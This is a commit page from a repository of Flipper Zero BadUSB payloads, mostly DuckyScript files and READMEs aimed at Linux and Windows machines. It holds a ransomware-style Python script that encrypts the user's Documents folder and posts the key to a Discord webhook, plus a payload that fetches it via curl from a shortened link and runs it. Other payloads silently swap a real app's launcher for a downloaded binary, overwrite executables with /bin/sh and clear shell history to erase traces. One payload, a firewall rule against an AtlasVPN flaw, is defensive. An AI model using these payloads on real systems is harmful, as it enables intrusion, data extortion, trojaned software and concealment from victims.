Hardware-Hacking/my-flipper-shits
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

hello

Browse Source
This commit is contained in:
Aleff
2025-07-04 07:09:11 +00:00
commit 9bcd0cf43d
317 changed files with 31531 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
.github/FUNDING.yml
+1
View File
@@ -0,0 +1 @@
github: [aleff-github]
.github/workflows/jekyll-gh-pages.yml
+51
View File
@@ -0,0 +1,51 @@
# Sample workflow for building and deploying a Jekyll site to GitHub Pages
name: Free and open source payloads for FlipperZero
on:
# Runs on pushes targeting the default branch
push:
branches: ["main"]
# Allows you to run this workflow manually from the Actions tab
workflow_dispatch:
# Sets permissions of the GITHUB_TOKEN to allow deployment to GitHub Pages
permissions:
contents: read
pages: write
id-token: write
# Allow only one concurrent deployment, skipping runs queued between the run in-progress and latest queued.
# However, do NOT cancel in-progress runs as we want to allow these production deployments to complete.
concurrency:
group: "pages"
cancel-in-progress: false
jobs:
# Build job
build:
runs-on: ubuntu-latest
steps:
- name: Checkout
uses: actions/checkout@v3
- name: Setup Pages
uses: actions/configure-pages@v3
- name: Build with Jekyll
uses: actions/jekyll-build-pages@v1
with:
source: ./
destination: ./_site
- name: Upload artifact
uses: actions/upload-pages-artifact@v1
# Deployment job
deploy:
environment:
name: github-pages
url: ${{ steps.deployment.outputs.page_url }}
runs-on: ubuntu-latest
needs: build
steps:
- name: Deploy to GitHub Pages
id: deployment
uses: actions/deploy-pages@v2
GNU-Linux/Execution/ChangeGitRemoteLink/README.md
+87
View File
@@ -0,0 +1,87 @@
# Change Remote Git Link
This script can be used to change the remote link from which updates will be downloaded and where new updates will be uploaded.
[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits)
**Category**: Execution
<div align=center>
<img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/logo-repository-2_0.gif" width="600" /><br><img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/DISCLAIMER.png" width="600" />
</div>
## Description
This script can be used to change the remote link from which updates will be downloaded and where new updates will be uploaded.
This script turns out to be very useful for aviting data leaks between old cloned repositories and new online repositories.
To make it easier to use below you can find the various tested configurations, at the moment it is not available for macOS because since I do not have one it cannot be tested and therefore I cannot give the certainty that it works, however I hope that in the Hak5 community there may be someone who can contribute to this payload by completing it with this missing part.
## Payload.txt config - Windows 10/11 - Tested on Windows 11
```DuckyScript
DELAY 1000
GUI r
DELAY 1000
STRING powershell
ENTER
DELAY 2000
```
## Payload.txt config - Linux (Debian based) - Tested on Ubuntu 23.04
```DuckyScript
DELAY 1000
CTRL-ALT t
DELAY 2000
```
## Dependencies
* Internet Connection
* git installed
* Full path of the cloned repository
* ExecutionPolicy Bypass
## Settings
- Full path of the local repository i.e. "C:\Users\User\Documents\Repository1"
```DuckyScript
DEFINE #FULL-PATH example
```
- Link from which updates are to be downloaded so the new repository the Repository2
```DuckyScript
DEFINE #NEW-GIT-LINK example.git
```
- REM Define the branch of the new repository Repository2, i.e. "main"
```DuckyScript
DEFINE #BRANCH example
```
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>
GNU-Linux/Execution/ChangeGitRemoteLink/payload.txt
+42
View File
@@ -0,0 +1,42 @@
REM ###########################################
REM # |
REM # Title : Change Remote Git Link |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Windows 10-11/Linux |
REM # |
REM ###########################################
REM Requirements:
REM - Internet Connection
REM - git installed
REM - Full path of the cloned repository
REM - ExecutionPolicy Bypass if runned on Windows
REM Full path of the local repository i.e. "C:\Users\User\Documents\Repository1"
DEFINE #FULL-PATH example
REM Link from which updates are to be downloaded so the new repository the Repository2
DEFINE #NEW-GIT-LINK example.git
REM Define the branch of the new repository Repository2, i.e. "main"
DEFINE #BRANCH example
DELAY 1000
GUI r
DELAY 1000
STRING powershell
ENTER
DELAY 2000
STRINGLN cd #FULL-PATH
DELAY 1000
STRINGLN git remote set-url origin #NEW-GIT-LINK
DELAY 1000
STRINGLN git pull --force origin #BRANCH
DELAY 1000
STRINGLN git reset --hard origin/#BRANCH
DELAY 1000
ALT F4
GNU-Linux/Execution/ChangeMacAddress_Linux/README.md
+58
View File
@@ -0,0 +1,58 @@
# Change MAC Address - BadUSB ✅
A script used to change the MAC address on a Linux machine.
[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits)
**Category**: Execution
<div align=center>
<img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/logo-repository-2_0.gif" width="600" /><br><img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/DISCLAIMER.png" width="600" />
</div>
## Description
A script used to change the MAC address on a Linux machine.
Opens a shell, get the network card name, set the new MAC address, erase traces.
## Getting Started
### Dependencies
* Linux Permissions
* Internet Connection
### Executing program
* Plug in your device
### Settings
* Set the sudo password
* Change as you want the new MAC address
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>
GNU-Linux/Execution/ChangeMacAddress_Linux/payload.txt
+73
View File
@@ -0,0 +1,73 @@
REM ###########################################
REM # |
REM # Title : Change Linux MAC Address |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Linux |
REM # |
REM ###########################################
REM Requirements:
REM - Permissions
DELAY 1000
CTRL-ALT t
DELAY 2000
REM #### PERMISSIONS SECTION ####
REM You need to know the sudo password and replace 'example' with this
DEFINE SUDO_PASS example
STRING sudo su
ENTER
DELAY 1000
STRING SUDO_PASS
ENTER
DELAY 1000
REM #### MAC SECTION ####
REM net-tools command
STRING apt install net-tools
ENTER
DELAY 2000
REM Set here your preferred MAC, you can don't change it remaining with the default value
DEFINE NEW_MAC 42:02:07:8f:a7:38
REM Get the net interface name
STRING INTERFACE=$(ip route get 8.8.8.8 | awk '{print $5}')
ENTER
DELAY 500
STRING ifconfig $INTERFACE down
ENTER
DELAY 500
STRING ifconfig $INTERFACE hw ether
STRING NEW_MAC
ENTER
DELAY 500
STRING ifconfig $INTERFACE up
ENTER
DELAY 500
REM #### REMOVE TRACES ####
DELAY 2000
STRING history -c
ENTER
REM Close shell
STRING exit
ENTER
GNU-Linux/Execution/ChangeNetworkConfiguration_Linux/README.md
+58
View File
@@ -0,0 +1,58 @@
# Change Network Configuration - BadUSB ✅
A script used to change the network configuration on a Linux machine.
[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits)
**Category**: Execution
<div align=center>
<img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/logo-repository-2_0.gif" width="600" /><br><img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/DISCLAIMER.png" width="600" />
</div>
## Description
A script used to change the network configuration on a Linux machine.
Opens a shell, get the network card name, set the network configuration, erase traces.
## Getting Started
### Dependencies
* Linux Permissions
* Internet Connection
### Executing program
* Plug in your device
### Settings
* Set the sudo password
* Change as you want the network configuration
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>
GNU-Linux/Execution/ChangeNetworkConfiguration_Linux/payload.txt
+81
View File
@@ -0,0 +1,81 @@
REM ###############################################
REM # |
REM # Title : Change Network Configuration |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Linux |
REM # |
REM ###############################################
REM Requirements:
REM - Permissions
DELAY 1000
CTRL-ALT t
DELAY 2000
REM #### PERMISSIONS SECTION ####
REM Required: You need to know the sudo password and replace 'example' with this
DEFINE SUDO_PASS example
STRING sudo su
ENTER
DELAY 1000
STRING SUDO_PASS
ENTER
DELAY 1000
REM #### IP SECTION ####
REM net-tools command
STRING apt install net-tools
ENTER
DELAY 2000
REM Set network interface
DEFINE IP 192.168.1.100
DEFINE MASK 255.255.255.0
DEFINE GATEWAY 192.168.1.1
STRING IP="
STRING IP
STRING "
ENTER
DELAY 500
STRING MASK="
STRING MASK
STRING "
ENTER
DELAY 500
STRING GATEWAY="
STRING GATEWAY
STRING "
ENTER
DELAY 500
REM Get the net interface name
STRING INTERFACE=$(ip route get 8.8.8.8 | awk '{print $5}')
ENTER
DELAY 500
STRING ifconfig $INTERFACE $IP netmask $MASK up
ENTER
DELAY 500
REM #### REMOVE TRACES ####
STRING history -c
ENTER
DELAY 500
REM Close shell
STRING exit
ENTER
GNU-Linux/Execution/Defend_yourself_against_AtlasVPN_bugdoor/1.png
BIN
View File
Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 57 KiB

GNU-Linux/Execution/Defend_yourself_against_AtlasVPN_bugdoor/README.md
+112
View File
@@ -0,0 +1,112 @@
# Defend yourself against AtlasVPN *Bug-Door*
This script has been developed to allow you to mitigate a well-known vulnerability in the AtlasVPN client based on its APIs, which, as of today, has not been resolved. The term "bugdoor" has been coined to describe this situation, as the bug has been reported multiple times without being addressed, effectively creating an open backdoor (bug + backdoor).
**Category**: Incident Response
![](1.png)
## Table of contents:
- Payload description
- AtlasVPN vulnerability
- - Summary
- - Dependencies
- Settings
- - Administrative Privileges
- - Set the rule
- - See the rule
- - Remove the rule
- Credits
## Payload description
This payload arises from the need to address a 0day vulnerability, which is now reasonable to assume has been known for mounths (maybe years), within the Linux client of AtlasVPN version 1.0.3. This vulnerability leads to a leakage of the user's real IP address, a situation that typically requires a prompt response from the company to provide a resolution patch and mitigate potential attacks.
However, in this case, the user who discovered the vulnerability had already proactively informed and reported it to the company in question. Surprisingly, up to this point, the company has not only failed to release any patches but has also not made any statements regarding the issue. This raises serious doubts about the nature of the problem, prompting questions (as highlighted by the vulnerability reporter) about the possibility that it might be an intentional bug or a deliberate backdoor, given that it is such a trivial error that it is absurd it hasn't been addressed proactively.
It's important to emphasize that these considerations represent personal opinions based on the original 0day report's message and should encourage discussions about cybersecurity and the reliability of the VPN service offered. If the company decides to provide a patch, it should also be required to explain the reason behind this prolonged negligence.
## AtlasVPN vulnerability
From [AtlasVPN Linux Client 1.0.3 Remote Disconnect Exploit](https://www.reddit.com/r/cybersecurity/comments/167f16e/atlasvpn_linux_client_103_remote_disconnect/)
> The following is my 0day. This code, when executed on any website, disconnects the AtlasVPN linux client and leaks the users IP address. I am not yet aware of it being used in the wild. However, it shows that AtlasVPN does not take their users safety serious, because their software security decisions suck so massively that its hard to believe this is a bug rather than a backdoor. Nobody can be this incompetent. I tried to contact their support to get hold of a security contact, a pgp key or any signs of a bug bounty programme. Nope. No answer.
### Summary
> The AtlasVPN Linux Client consists of two parts. A daemon (atlasvpnd) that manages the connections and a client (atlasvpn) that the user controls to connect, disconnect and list services. The client does not connect via a local socket or any other secure means but instead it opens an API on localhost on port 8076. It does not have ANY authentication. This port can be accessed by ANY program running on the computer, including the browser. A malicious javascript on ANY website can therefore craft a request to that port and disconnect the VPN. If it then runs another request, this leaks the users home IP address to ANY website using the exploit code.
The exploit code will not be included in this payload, as the primary goal here is defensive, not offensive. It's important to note that it's relatively easy to find a fully functional Proof of Concept (POC) for this vulnerability online if you need it for vulnerability testing purposes.
### Dependencies
Source [1]: https://www.reddit.com/r/cybersecurity/comments/167f16e/atlasvpn_linux_client_103_remote_disconnect/
Source [2] (Italian article): https://www.redhotcyber.com/post/ce-poco-da-nascondersi-il-bug-sul-client-di-atlas-vpn-rende-tutti-visibili/
## Settings
In order to mitigate this critical vulnerability, it is imperative to understand its operation at a more detailed level. Specifically, in the case of the AtlasVPN client, it is relevant to note that it opens an API service on localhost at port 8076 without any form of authentication. This lack of authentication allows, based on this specific detail, full access not only to any programs running on the computer but also (and this is the most concerning aspect) to any website making appropriate requests. This is an extremely serious vulnerability that exposes the user significantly. Therefore, waiting for a patch is not acceptable, and it is essential to take prompt action, even independently, perhaps using this payload.
This "home-made" solution involves partially closing port 8076, specifically by disabling the ability to establish new incoming connections through the same port. It is important to note that there are various attack strategies that could potentially bypass this protection, but at least a basic level of security is applied, which is not present by default. It is crucial to understand that this solution does not completely resolve the vulnerability but rather reduces the risk of being targeted by attacks based on it.
### Administrative Privileges
To apply this homemade patch, you will need to set up a Firewall rule, and therefore, you must have knowledge of the password to acquire administrator or root permissions.
### Set the rule
The Firewall rule that will be set will aim to block all connections that try to create a new connection on port 8076.
`sudo iptables -A INPUT -p tcp --dport 8076 -m state --state NEW -j DROP`
**sudo**: The command is run with administrator or root privileges to allow configuration of firewall rules.
**iptables**: This is the command for configuring the firewall iptables.
**-A INPUT**: This indicates that the rule will be added to the input chain, which handles incoming traffic.
**-p tcp**: This specifies that the rule applies only to TCP traffic.
**--dport 8076**: Specifies that the rule applies to traffic destined for port 8076.
**-m state --state NEW**: Uses the "state" form to specify that the rule applies only to new incoming connections ("NEW" state).
**-j DROP**: Indicates that the action to be taken for matches to this rule is "DROP," i.e., rejecting or blocking the connection.
### See the rule
If you want to see the rule you can use the command `iptables -S` with `grep "8076"`.
`sudo iptables -S | grep "8076"`
### Remove the rule
One of the ways to delete iptables rules is by rule specification. To do so, you can run the iptables command with the -D option followed by the rule specification.
`sudo iptables -D INPUT -p tcp --dport 8076 -m state --state NEW -j DROP`
![](1.png)
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>
GNU-Linux/Execution/Defend_yourself_against_AtlasVPN_bugdoor/payload.txt
+32
View File
@@ -0,0 +1,32 @@
REM ############################################################
REM # #
REM # Title : Defend yourself against AtlasVPN Bug-Door #
REM # Author : Aleff #
REM # Version : 1.0 #
REM # Category : Execution #
REM # Target : Linux #
REM # #
REM ############################################################
REM Requirements:
REM - Administrator Permission
REM - AtlasVPN installed
REM Define the sudo user password
DEFINE #SUDO-PWS example
DELAY 1000
CTRL-ALT t
DELAY 2000
REM Add the rule and close the shell
STRINGLN sudo iptables -A INPUT -p tcp --dport 8076 -m state --state NEW -j DROP; exit;
REM Add the rule and display it
REM STRINGLN sudo iptables -A INPUT -p tcp --dport 8076 -m state --state NEW -j DROP; sudo iptables -S | grep "8076";
REM Remove the rule
REM STRINGLN sudo iptables -D INPUT -p tcp --dport 8076 -m state --state NEW -j DROP
DELAY 500
STRINGLN #SUDO-PWS
GNU-Linux/Execution/Edit_The_Default_Real_App_With_An_Arbitrary/README.md
+66
View File
@@ -0,0 +1,66 @@
# Edit The Default Real App With An Arbitrary
A script used to download a modified application on the target computer that will be executed insted off the original one without notify it to the user.
[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits)
**Category**: Execution
<div align=center>
<img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/logo-repository-2_0.gif" width="600" /><br><img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/DISCLAIMER.png" width="600" />
</div>
## Description
A script used to download a modified application on the target computer that will be executed insted off the original one without notify it to the user.
The script will download the zip archive in wich you should have the modified application, then unzip the archive and remove the original zip, then replace the original desktop file with the one that is present on the archive.
## Getting Started
### Dependencies
* sudo permissions
* Internet Connection
* Original application installed
### Settings
- Set the link from which to download the zipper archive
```DuckyScript
DEFINE ARBITRARY_APP_LINK example
```
- You must set the desktop file path present in the zip file, if i.e. you have the app name Signal and the desktop file path is Signal/files/signal you should put the path Signal/files/signal
```DuckyScript
DEFINE PATH_TO_DESKTOP_FILE example/path
```
- You must know the original desktop name file, if you don't know it you can rich this information download the app on you system and going to /usr/share/applications/ searching this one app, i.e. the desktop file name of Signal application is signal-desktop.desktop, so in this case you should put signal-desktop.desktop
```DuckyScript
DEFINE ORIGINAL_DESKTOP_FILE_NAME example
```
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>
GNU-Linux/Execution/Edit_The_Default_Real_App_With_An_Arbitrary/[EXAMPLE]arbitrary_file.desktop
+10
View File
@@ -0,0 +1,10 @@
[Desktop Entry]
Name=Signal
Exec=~/.arbitrary/bin/signal-desktop --no-sandbox %U
Terminal=false
Type=Application
Icon=signal-desktop
StartupWMClass=Signal
Comment=Private messaging from your desktop
MimeType=x-scheme-handler/sgnl;x-scheme-handler/signalcaptcha;
Categories=Network;InstantMessaging;Chat;
GNU-Linux/Execution/Edit_The_Default_Real_App_With_An_Arbitrary/[EXAMPLE]original_desktop_file.desktop
+10
View File
@@ -0,0 +1,10 @@
[Desktop Entry]
Name=Signal
Exec=/opt/Signal/signal-desktop --no-sandbox %U
Terminal=false
Type=Application
Icon=signal-desktop
StartupWMClass=Signal
Comment=Private messaging from your desktop
MimeType=x-scheme-handler/sgnl;x-scheme-handler/signalcaptcha;
Categories=Network;InstantMessaging;Chat;
GNU-Linux/Execution/Edit_The_Default_Real_App_With_An_Arbitrary/payload.txt
+63
View File
@@ -0,0 +1,63 @@
REM ################################################################
REM # |
REM # Title : Edit The Default Real App With An Arbitrary |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : GNU/Linux (Debian based tested) |
REM # |
REM ################################################################
REM Requirements:
REM - sudo permissions
REM - Internet connection
REM - Executable app
REM - '.desktop' file
REM Note:
REM - The Depends* time depends by the app size, the connection fast and the computer power, you should test it
REM Set the link from wich will be downloaded the zip archive
DEFINE ARBITRARY_APP_LINK example
REM You must set the desktop file path present in the zip file, if i.e. you have the app name Signal and the desktop file path is Signal/files/signal you should put the path Signal/files/signal
DEFINE PATH_TO_DESKTOP_FILE example/path
REM You must know the original desktop name file, if you don't know it you can rich this information download the app on you system and going to /usr/share/applications/ searching this one app, i.e. the desktop file name of Signal application is signal-desktop.desktop, so in this case you should put signal-desktop.desktop
DEFINE ORIGINAL_DESKTOP_FILE_NAME example
REM sudo permissions needed
DEFINE SUDO example
REM Open a shell
DELAY 2000
CTRL-ALT t
DELAY 1000
STRING curl -o ./arbitrary.zip "
STRING ARBITRARY_APP_LINK
STRINGLN "
REM Depends*
DELAY 5000
STRINGLN unzip ./arbitrary.zip -d ./.arbitrary
REM Depends*
DELAY 2000
STRINGLN rm ./arbitrary.zip
DELAY 1000
STRING sudo mv ./.arbitrary/
STRING PATH_TO_DESKTOP_FILE
STRING /usr/share/applications/
STRING ORIGINAL_DESKTOP_FILE_NAME
ENTER
DELAY 1000
STRING SUDO
ENTER
DELAY 4000
ALT f4
GNU-Linux/Execution/EncryptAllDocuments_Linux/EncryptAllDocumentsScript.py
+42
View File
@@ -0,0 +1,42 @@
from cryptography.fernet import Fernet
import os
import requests
import subprocess
import json
"""Cipher function"""
def cyp_folder(path, fernet):
for root, files in os.walk(path):
for filename in files:
filepath = os.path.join(root, filename)
if not os.access(filepath, os.R_OK):
continue
if "directory" in str(os.system(f"file {filepath}")):
cyp_folder(path=filepath, fernet=fernet)
with open(filepath, "rb") as f:
data = f.read()
encrypted_data = fernet.encrypt(data)
with open(filepath, "wb") as f:
f.write(encrypted_data)
"""Send the key used for encryption"""
def send_key(username, key, discord_webhook_url):
message = {
"username": f"{username}",
"content": f"Key:{key}"
}
message_json = json.dumps(message)
requests.post(discord_webhook_url, data=message_json, headers={'Content-Type': 'application/json'})
"""Just some variables"""
KEY = Fernet.generate_key()
FERNET = Fernet(KEY)
USERNAME = subprocess.check_output(['whoami']).decode('ascii')
INITIAL_PATH = f"/home/{USERNAME}/Documents/"
WEBHOOK_URL = ''
cyp_folder(path=INITIAL_PATH, fernet=FERNET)
send_key(username=USERNAME, key=KEY, discord_webhook_url=WEBHOOK_URL)
GNU-Linux/Execution/EncryptAllDocuments_Linux/README.md
+56
View File
@@ -0,0 +1,56 @@
# Encrypt All Documents - BadUSB ✅
A script used to encrypt all documents.
[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits)
**Category**: Execution
<div align=center>
<img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/logo-repository-2_0.gif" width="600" /><br><img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/DISCLAIMER.png" width="600" />
</div>
## Description
A script used to encrypt all documents.
Opens a shell, dowloand the Python script and use the Fernet cipher for encrypt all files.
## Getting Started
### Dependencies
* Internet Connection
* Discord Webhook
### Executing program
* Plug in your device
### Settings
- Set your Discord Webhook
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>
GNU-Linux/Execution/EncryptAllDocuments_Linux/payload.txt
+44
View File
@@ -0,0 +1,44 @@
REM ########################################
REM # |
REM # Title : Encrypt All Documents |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Linux |
REM # |
REM ########################################
REM ATTENTION - BEFORE USING THIS PAYLOAD MAKE SURE YOU UNDERSTAND WHAT IT DOES
REM
REM Script description
REM
REM The Python code defines a function "cyp_folder" that encrypts all files in a folder (and its subfolders) using the Fernet encryption algorithm. The function takes two arguments: the path of the folder to be encrypted ("path") and a Fernet object ("fernet") that contains the encryption key.
REM
REM Inside the function, the os.walk function is used to obtain a list of all files in the specified folder and its subfolders. For each file found, its full path is created and checked for readability using the os.access function. If the file is not readable, the loop moves on to the next file.
REM
REM The "file" Linux command is then executed to determine if the file is a text file or a directory. If the file is a directory, the "cyp_folder" function is recursively called on the directory.
REM
REM If the file is a text file (or however not a directory), it is opened in binary read mode using the "open" function. The contents of the file are read and then encrypted using the "encrypt" function of the Fernet object.
REM
REM Finally, the file is opened in binary write mode and the encrypted content is written to the file, overwriting the original content.
REM
REM In summary, the code encrypts all files in a folder (and its subfolders) using the Fernet encryption algorithm and overwrites the original content with the encrypted content.
REM
REM Requirements:
REM - Internet Connection
REM - Discord Webhook
DELAY 1000
CTRL-ALT t
DELAY 2000
STRING curl bit.ly/EncryptAllDocuments > script.py
ENTER
REM It depends by the internet connection, btw 2/3 seconds is a lot for a fiew text line...
DELAY 2000
STIRNG python3 script.py; history -c; exit;
ENTER
GNU-Linux/Execution/ExploitingAnExecutableFile/README.md
+53
View File
@@ -0,0 +1,53 @@
# Exploiting An Executable File - Linux ✅
Plug-And-Play ❤️
A script used to detect all executable files in a Linux system. An executable file can be used in cybersecurity to execute some script without having the necessary permissions to make it executable.
[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits)
**Category**: Execution
<div align=center>
<img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/logo-repository-2_0.gif" width="600" /><br><img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/DISCLAIMER.png" width="600" />
</div>
## Description
A script used to detect all executable files in a Linux system. An executable file can be used in cybersecurity to execute some script without having the necessary permissions to make it executable.
**Remember that any execution that is not permitted is not legitimate**.
## Getting Started
### Dependencies
* Linux system
### Settings
* You can edit the content that you want to put into the executable file (line 10 of the script.sh).
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>
GNU-Linux/Execution/ExploitingAnExecutableFile/payload.txt
+81
View File
@@ -0,0 +1,81 @@
REM ################################################
REM # |
REM # Title : Exploiting An Executable File |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Linux |
REM # |
REM ################################################
REM Requirements:
REM - Nothing, it is Plug-And-Play but you can change it as you want.
DELAY 1000
CTRL-ALT t
DELAY 2000
REM #### Script ####
STRING USER=$(whoami)
ENTER
DELAY 500
STRING DIR=/home/$USER/Documents
ENTER
DELAY 500
REM #### Function Definition ####
STRING function search_file {
ENTER
DELAY 500
STRING for file in "$1"/*; do
ENTER
DELAY 500
STRING if [[ -d "$file" ]]; then
ENTER
DELAY 500
STRING search_file "$file"
ENTER
DELAY 500
STRING elif [[ -f "$file" && -r "$file" && -w "$file" && -x "$file" ]]; then
ENTER
DELAY 500
STRING echo "File Found: $file"
ENTER
DELAY 500
REM Decomment it if you want to put "/bin/sh" into the files, else do what you want
STRING # echo "/bin/sh" > "\$file"
ENTER
DELAY 500
STRING fi
ENTER
DELAY 500
STRING done
ENTER
DELAY 500
STRING }
ENTER
DELAY 500
REM #### Function Run ####
STRING search_file "$DIR"
ENTER
GNU-Linux/Execution/ExploitingAnExecutableFile/script.sh
+19
View File
@@ -0,0 +1,19 @@
#!/bin/bash
function search_file {
for file in "$1"/*; do
if [[ -d "$file" ]]; then
search_file "$file"
elif [[ -f "$file" && -r "$file" && -w "$file" && -x "$file" ]]; then
echo "File Found: $file"
# You can put whatever you want into the executable file
# echo "/bin/sh" > "$file"
fi
done
}
USER=$(whoami)
# You can choose whatever folder you want, the script is recursive.
DIR=/home/$USER/Documents
search_file "$DIR"
GNU-Linux/Execution/Persistent_Keylogger-Telegram_Based/README.md
+61
View File
@@ -0,0 +1,61 @@
# Persistent Keylogger - Telegram Based
A script used to configure a persistent keylogger on a Linux computer trough a pre-configured Telegram Bot.
[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits)
**Category**: Execution
<div align=center>
<img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/logo-repository-2_0.gif" width="600" /><br><img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/DISCLAIMER.png" width="600" />
</div>
## Dependencies
* Internet Connection
## Description
A script used to configure a persistent keylogger on a Linux computer trough a pre-configured Telegram Bot.
This payload is based on [Telegram Persistent Connection](Telegram_Persistent_Connection) payload for create the Telegram connection.
In the script, you can find two classes that inherit Thread called Keylogger and Sender, and a shared memory class called Log. The Thread classes perform two distinct tasks:
